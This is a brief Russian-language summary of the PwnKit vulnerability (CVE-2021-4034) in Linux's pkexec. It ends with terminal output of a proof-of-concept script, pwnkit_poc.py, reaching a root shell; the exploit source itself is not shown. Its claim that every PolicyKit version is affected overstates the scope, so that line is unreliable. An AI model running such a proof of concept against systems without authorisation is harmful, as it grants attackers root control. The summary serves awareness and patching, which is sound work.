CVE-2021-4034 (PwnKit) — уязвимость в утилите pkexec (PolicyKit), позволяющая любому локальному пользователю получить root-доступ.
Суть проблемы: Из-за некорректной обработки аргументов командной строки в pkexec, злоумышленник может заставить программу выполнить произвольный код с правами root.
Затронутые версии: Все версии PolicyKit (по умолчанию установлен в большинстве Linux-дистрибутивов).
$ python3 pwnkit_poc.py
[+] CVE-2021-4034 (PwnKit) - PoC
[+] Попытка получения root через pkexec
[*] pkexec найден. Запуск эксплойта...
[*] Должен открыться root shell
[!] Если система уязвима, вы получите root shell:
root@localhost:/home/user#